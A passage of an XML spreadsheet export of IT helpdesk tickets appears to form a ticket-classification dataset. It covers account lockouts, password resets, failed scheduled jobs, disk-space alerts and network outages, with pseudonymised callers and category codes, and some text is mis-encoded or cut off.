    <s v="hi team, _x000d__x000a__x000d__x000a__x000d__x000a_could you please  route the all files print  pa07 hp m4555 (ip: 79.67.01.6592) to: plant_248 hp m600 (61.01.52.0266)._x000d__x000a__x000d__x000a_note: pa07 have a problem hardware_x000d__x000a_if you have more doubts, please contact me._x000d__x000a__x000d__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="xandvryi jcsnqxpt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tonerpatrone em01 / germany alle"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yzodcxkn.zyewibop@gmail.com_x000d__x000a__x000d__x000a_bitte toner an em01 prÃ¼fen und ersetzen_x000d__x000a__x000d__x000a_freundlicher gruÃŸ / best "/>
    <s v="yzodcxkn zyewibop"/>
    <x v="41"/>
  </r>
  <r>
    <s v="bitte guest wifi fuer gastronomie fuer eine jahr einrichten"/>
    <s v="bitte guest wifi fuer gastronomie fuer eine jahr einrichten"/>
    <s v="gosqphkl grmuhwix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update - inplant_859150"/>
    <s v="ticket update - inplant_859150"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password_management_tool account unlock"/>
    <s v="password_management_tool account unlock"/>
    <s v="lkfzibrx ljnabpgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_577_dr4100 failed in job_scheduler at: 09/19/2016 06:19:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_577_dr4100 failed in job_scheduler at: 09/19/2016 06:19:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_575 failed in job_scheduler at: 09/19/2016 06:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_575 failed in job_scheduler at: 09/19/2016 06:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to received incoming email"/>
    <s v="hi it team_x000a__x000a_kindly please assist, user kassiaryu unable to received incoming email._x000a_pc name: aswl8912729._x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd _x000a_email : rxoynvgi.ntgdsehl@gmail.com_x000a_"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_29_x000a__x000a_enter user id of user having the issue: mahapthysk, ngyht2_x000a__x000a_transaction code(s) the user needs or was working with: we05_x000a__x000a_describe the issue: no authorization to open employee idoc_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="tavsikpl dcrkwuny"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/19/2016 05:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/19/2016 05:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to loginto skype"/>
    <s v="unable to loginto skype"/>
    <s v="hlcujyed hqfolasz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need assistance - cannot login to engineering tool web application after password change"/>
    <s v="need assistance - cannot login to engineering tool web application after password change"/>
    <s v="sjeryqba rwtxpzku"/>
    <x v="28"/>
  </r>
  <r>
    <s v="add user maghtyion cnjkeko (cekomthyr) to active directory group eagcutview"/>
    <s v="add user maghtyion cnjkeko (cekomthyr) to active directory group eagcutview"/>
    <s v="skocrqdw pexcdfao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3181 failed in job_scheduler at: 09/19/2016 05:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3181 failed in job_scheduler at: 09/19/2016 05:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_459 failed in job_scheduler at: 09/19/2016 04:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_459 failed in job_scheduler at: 09/19/2016 04:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="hi manjgtiry,_x000d__x000a__x000d__x000a_"/>
    <s v="mcytlpva jutxbdor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_499 failed in job_scheduler at: 09/19/2016 04:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_499 failed in job_scheduler at: 09/19/2016 04:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_465 failed in job_scheduler at: 09/19/2016 04:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_465 failed in job_scheduler at: 09/19/2016 04:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 09/19/2016 04:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 09/19/2016 04:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="pls help to create delivery note for sto 4908128350"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to create delivery note for sto 5019239461,it's urgent for plant_305,for something error we unable to create, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/19/2016 04:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[critical] from: bda-net@lhqSID_1839.company.company.com &quot;lhqSID_1839.company.company.com [/f]&quot;  time: 9/19/2016 3:33:53 am_x000d__x000a_ ipc failure reading net message (ipc read error_x000d__x000a_ system error: [10054] connection reset by peer_x000d__x000a_) =&gt; aborting._x000d__x000a__x000d__x000a_ backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         35          _x000d__x000a_  failed disk agents ...........          3          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         38          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          0          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................  499365 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          4  _x000d__x000a__x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/19/2016 04:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cannot create engineering tool task for er, "/>
    <s v="cannot create engineering tool task for er, please help to deal with._x000a_any problems, contact gaop&lt;scievjwr.cdlsvoif@gmail.com&gt;_x000a_t   "/>
    <s v="scievjwr cdlsvoif"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp systems are slow in plant"/>
    <s v="erp systems are slow in plant_x000a_all erp users in plant_x000a_"/>
    <s v="ouqzfajm pioneqcg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: access to company guest from 19 september to 1 october 2016"/>
    <s v="_x000a__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000a__x000a_hello,_x000a_please usa the following consultants from attendance_tool access to company guest for 2 weeks from 19 september to 1 october._x000a__x000a_roshyario.mcfaullfhry@attendance_tool.com&lt;mailto:roshyario.mcfaullfhry@attendance_tool.com&gt;  (roshyario mcfaullfhry)_x000a_ssofgrtymerset@attendance_tool.com&lt;mailto:ssofgrtymerset@attendance_tool.com&gt;  (sarhfa ssofgrtymerset)_x000a_josefghph.hughdthes@attendance_tool.com&lt;mailto:josefghph.hughdthes@attendance_tool.com&gt;  (josefghph hughdthes)_x000a_jofgyst.langytge@attendance_tool.com&lt;mailto:jofgyst.langytge@attendance_tool.com&gt;  (jofgyst langytge)_x000a__x000a_please confirm when done._x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="how did you determine there are network problems ?_x000d__x000a__x000d__x000a_is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow)_x000d__x000a__x000d__x000a_are more than one transactions impacted?_x000d__x000a__x000d__x000a_what erp server are you on (server name is located in the status bar at the bottom _x000d__x000a_right of your screen) ?_x000d__x000a__x000d__x000a_do other co-workers also notice slow response times in erp ?_x000d__x000a__x000d__x000a_what other applications are running slow ? _x000d__x000a__x000d__x000a_can you access your data files on the server ?_x000d__x000a__x000d__x000a_any other comments or issues with other systems ?"/>
    <s v="jgmlbxns pxjsdwrk"/>
    <x v="13"/>
  </r>
  <r>
    <s v="laptop speakers not working. mic not working during skype concall"/>
    <s v="head set input jack no longer ask questions during plug in"/>
    <s v="jgautdmk fpurxzew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype "/>
    <s v="unable to login to skype _x000a_m "/>
    <s v="yjwivxsh fcetobrj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="infotype 17 has been deleted for huge number of travelers in germany in SID_34"/>
    <s v="we are facing huge issues that german travelers cannot enter their expenses in erp SID_34, because their infotype 17 does not exist again. we have to create it manually for each of them which is relly time consuming. some of them don't even know who to contact when the error comes up. _x000d__x000a_what happened? why was the infotype deleted? can it be re-created automatically somehow? _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ipwjorsc uboapexr"/>
    <x v="9"/>
  </r>
  <r>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over  85% space consumed. space available: 4.6 g"/>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 85% space consumed. space available: 4.6 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="38"/>
  </r>
  <r>
    <s v="apusm00 : volume: f:\ label:dat2-HostName_53 d4e35b72 is over  85% space consumed. space available: 0.98 m"/>
    <s v="apusm00 : volume: f:\ label:dat2-HostName_53 d4e35b72 is over  85% space consumed. space available: 0.98 m"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="how did you determine there are network problems ?_x000d__x000a__x000d__x000a_is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow)_x000d__x000a__x000d__x000a_are more than one transactions impacted?_x000d__x000a__x000d__x000a_what erp server are you on (server name is located in the status bar at the bottom _x000d__x000a_right of your screen) ?_x000d__x000a__x000d__x000a_do other co-workers also notice slow response times in erp ?_x000d__x000a__x000d__x000a_what other applications are running slow ? _x000d__x000a__x000d__x000a_can you access your data files on the server ?_x000d__x000a__x000d__x000a_any other comments or issues with other systems ?"/>
    <s v="jgmlbxns pxjsdwrk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connection to finance_app data base"/>
    <s v="_x000d__x000a__x000d__x000a_received from: naisdxtk.mqzvewsb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i receive the following error message when i try to open finance_app â€“ plant monthly book. could you please check?_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35259.57ca22e0]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ssen / kind "/>
    <s v="naisdxtk mqzvewsb"/>
    <x v="54"/>
  </r>
  <r>
    <s v="ä¼ çœŸæœºä¸æ¸…æ¥š"/>
    <s v="to å°è´ºï¼šä¼ çœŸæœºä¼ çœŸå‡ºæ¥æœ‰å¾ˆç²—çš„é»‘è‰²å¢¨è¿¹ï¼Œè¯·å¸®å¿™æŸ¥çœ‹ä¸€ä¸‹ï¼Œè°¢è°¢"/>
    <s v="xqyjztnm onfusvlz"/>
    <x v="30"/>
  </r>
  <r>
    <s v="accout locked "/>
    <s v="accout locked "/>
    <s v="afijkocw rjtxslpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is prompting for password again and again "/>
    <s v="outlook is prompting for password again and again "/>
    <s v="jloygrwh acvztedi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_21 and SID_1 not working "/>
    <s v="erp SID_21 and SID_1 not working "/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need erp access to the stated roles"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_21 &amp; SID_33_x000a_enter user id of user having the issue: gthydanp_x000a__x000a_transaction code(s) the user needs or was working with: _x000a__x000a_describe the issue: need access to the stated roles_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user: manjuvghy"/>
    <s v="svdefgwl sgtmurfh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="collaboration_platform issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lwizucan.zvnxlobq@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_last week i setup collaboration_platform, and after start shatryung, my collaboration_platform didn't recognize me as owner so that i couldn't make any action._x000d__x000a_today i started collaboration_platform again, and now it is telling me that it couldn't connect to the server, while the vpn connection was established._x000d__x000a__x000d__x000a_hope you can help me fixing those issues?_x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35250.d48f7220]_x000d__x000a__x000d__x000a_met vriendelijke groet,_x000d__x000a__x000d__x000a_lwizucan zvnxlobq_x000d__x000a_directeur company benelthyux_x000d__x000a_lwizucan.zvnxlobq@gmail.com&lt;mailto:lwizucan.zvnxlobq@gmail.com&gt;_x000d__x000a_m  +31 6 57 84 21 40_x000d__x000a_t    +31 800 4433 201_x000d__x000a_f    +31 800 3500 107_x000d__x000a__x000d__x000a_company nederland bv | wim duisenbergplantsoen 31 | 6221 se maastricht | www.company.com&lt;_x000d__x000a_company nederland bv | postbus 982 | 6200 az maastricht_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="lwizucan zvnxlobq"/>
    <x v="15"/>
  </r>
  <r>
    <s v="computer unable to connection company network."/>
    <s v="computer unable to connection company network. pc got ip address --192.168.32.100"/>
    <s v="eokwrjcx qxzkboeg"/>
    <x v="31"/>
  </r>
  <r>
    <s v="der mitarbeiter schrenfgker heinrifgtch (pn 50388) benÃ¶tigt zugriff im pulverleitstand (lesen &amp; eintragen)."/>
    <s v="der mitarbeiter schrenfgker heinrifgtch (pn 50388) benÃ¶tigt zugriff im pulverleitstand (lesen &amp; eintragen). "/>
    <s v="mdkbjzrt qaxhznvy"/>
    <x v="25"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="izkjplwq flztpqxk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="owdiqpfc hzutrscx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="djilqgmw bidchqsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create stock recall form"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_helloâ€¦._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01SID_35266.3a795500]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="eeml8143294 / wlan lÃ¤sst sich nicht per knopfdruck de-/aktivieren"/>
    <s v="eeml8143294 / wlan lÃ¤sst sich nicht per knopfdruck de-/aktivieren (xvwchsdg pladjmxt ist informiert)_x000a__x000a_bitte zu haende hrrn pries."/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="41"/>
  </r>
  <r>
    <s v="atp not getting committed in SID_1"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iwqfelcu.gsubfiml@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please note that atp is not getting committed in SID_1.  the screen shot of error msg. is given below._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35260.f9ddd1b0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="iwqfelcu gsubfiml"/>
    <x v="5"/>
  </r>
  <r>
    <s v="vpn ä¸èƒ½è¿žæŽ¥"/>
    <s v="vpn ä¸èƒ½è¿žæŽ¥"/>
    <s v="fcvqezmn frzyjknu"/>
    <x v="31"/>
  </r>
  <r>
    <s v="how to change password in outllok"/>
    <s v="_x000a_name:srinfhyath_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:kflqpite.gbeoqsnc@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:how to change password in outllok"/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="time cards not automatically generating."/>
    <s v="time cards not automatically generating."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="35"/>
  </r>
  <r>
    <s v="vvdgtyachac"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_below mentioned apprentice is unable to login his desktop. please reset the password._x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_20271667_x000a__x000a_cheghthan achghar_x000a__x000a_vvdgtyachac_x000a__x000a__x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç™»å½•è¿›åŽ»åŽæ— æ³•æ–°å»ºå®¢æˆ·ä¿¡æ¯ï¼Œæ— æ³•æŠ¥ä»·"/>
    <s v="~connect_ui/setting/view?brand=kd&amp;language=zh-cn&amp;dv=1474256654564  è¿™æ˜¯ç™»å½•è¿›åŽ»åŽçš„æ“ä½œç•Œé¢ï¼Œé”€å”®ç»„ç»‡æ— æ³•ç¼–è¾‘ï¼Œä¸èƒ½å»ºå®¢æˆ·ï¼ŒæŠ¥ä»·ä¹ŸæŠ¥ä¸äº†ï¼Œè¯·å¸®å¿™å¤„ç†ä¸‹ï¼Œæ„Ÿè°¢ï¼ _x000d__x000a__x000d__x000a_"/>
    <s v="pfiyvdea uwbdsfmr"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="tauogwvl xfvqakdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 09/18/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 09/18/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 09/18/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 09/18/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 09/18/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 09/18/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="reset password"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist to reset SID_34 password for user: kassia_x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a__x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 09/18/2016 22:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 09/18/2016 22:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="how to connect to mobile hotspot "/>
    <s v="how to connect to mobile hotspot "/>
    <s v="csotmdiw yfeqcbti"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ie æµè§ˆå™¨é—®é¢˜,æœç´¢ç½‘é¡µåŽä¸èƒ½æ‰“å¼€ã€‚"/>
    <s v="ie æµè§ˆå™¨é—®é¢˜,æœç´¢ç½‘é¡µåŽä¸èƒ½æ‰“å¼€ã€‚"/>
    <s v="napijrez xhpqkojc"/>
    <x v="31"/>
  </r>
  <r>
    <s v="reset passwords for jerydwbn gdylnaue using password_management_tool password reset."/>
    <s v="the"/>
    <s v="jerydwbn gdylnaue"/>
    <x v="16"/>
  </r>
  <r>
    <s v="unable to login to microsoft account and need password"/>
    <s v="unable to login to microsoft account and need password"/>
    <s v="qcxivzag vyucbagx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry on erp availability."/>
    <s v="inquiry on erp availability."/>
    <s v="lsnpgqea hzeausvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lhqSID_1855: h:\  is  is over 85% space consumed. space available: 2.2 g.. "/>
    <s v="volume: h:\ label:oraarch 844d5322 on server: lhqSID_1855 is over 85% space consumed. space available: 2.2 g"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="1"/>
  </r>
  <r>
    <s v="circuit outage:Â·2 mbps internet link to telecom_vendor_1 circuit id on company-ap-ind-india-dmvpn-1811-rtr.company.com is down since 5:15 pm"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___5:15 pm et on 09/18_____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primary is active___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telecom_vendor_1#24095925____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  __(yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to login to system"/>
    <s v="unable to login to system"/>
    <s v="amiodlfy gmcoruwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1388 failed in job_scheduler at: 09/18/2016 18:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1388 failed in job_scheduler at: 09/18/2016 18:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job bkbackup_tool_csqe_prod_inc failed in job_scheduler at: 09/18/2016 18:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_csqe_prod_inc failed in job_scheduler at: 09/18/2016 18:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1422 failed in job_scheduler at: 09/18/2016 14:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1422 failed in job_scheduler at: 09/18/2016 14:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp password block"/>
    <s v="_x000a__x000a_received from: rhwvpmlq.zuwhpqrc@gmail.com_x000a__x000a_dear sir,_x000a__x000a_my erp password is blocked , request you to kindly re-set the password._x000a__x000a_employee code : 20275682_x000a_login id : achghyardr_x000a__x000a__x000a__x000a_"/>
    <s v="rhwvpmlq zuwhpqrc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for dmexgspl mruzqhac using password_management_tool password reset."/>
    <s v="the"/>
    <s v="dmexgspl mruzqhac"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job snp_heu_6_regen failed in job_scheduler at: 09/18/2016 11:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_6_regen failed in job_scheduler at: 09/18/2016 11:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="skype : personal certificate issue "/>
    <s v="skype : personal certificate issue "/>
    <s v="wauhocsk vxuikqaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1348a failed in job_scheduler at: 09/18/2016 11:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348a failed in job_scheduler at: 09/18/2016 11:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1353 failed in job_scheduler at: 09/18/2016 11:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1353 failed in job_scheduler at: 09/18/2016 11:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="why we can't use the outlook groups ? "/>
    <s v="_x000d__x000a__x000d__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000d__x000a__x000d__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abend batch job:Job_1391"/>
    <s v="job name:Job_1391"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1391 failed in job_scheduler at: 09/18/2016 10:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1391 failed in job_scheduler at: 09/18/2016 10:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 09/18/2016 09:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 09/18/2016 09:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ooo until 30.9.2016 : engineering_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wsczgfal.hjfklsdg@gmail.com_x000d__x000a__x000d__x000a_witam,_x000d__x000a__x000d__x000a_zgÅ‚aszam kÅ‚opoty z engineering_tool-em_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_351c2.c943d840]_x000d__x000a__x000d__x000a_nie moÅ¼na zrobiÄ‡ synchronizacji, brak raportÃ³w itp._x000d__x000a__x000d__x000a_pozdrawiam/best "/>
    <s v="wsczgfal hjfklsdg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked out and password reset "/>
    <s v="erp SID_34 account locked out and password reset "/>
    <s v="incjpxsq gdxbvaqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1348 failed in job_scheduler at: 09/18/2016 08:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348 failed in job_scheduler at: 09/18/2016 08:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="power outage :south_amerirtca :site is hard down since at 8:19 am et on 09/18."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______8:19 am et on 09/18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job Job_1368 failed in job_scheduler at: 09/18/2016 08:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1368 failed in job_scheduler at: 09/18/2016 08:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1382 failed in job_scheduler at: 09/18/2016 08:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1382 failed in job_scheduler at: 09/18/2016 08:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 09/18/2016 07:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 09/18/2016 07:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="skype login issue : personal certificate issue"/>
    <s v="_x000a_summary:my skype business cannot login, error message is &quot; there was a problem acquiring personal certificate required to sign in&quot;_x000a_please help to solve this. "/>
    <s v="hbodpniz jvqpxohl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="apac company:  fastethernet0/48 Â· uplink to company-ap-chn-apac-2950-24-access-sw05 is down since 23:31 et on 09/17"/>
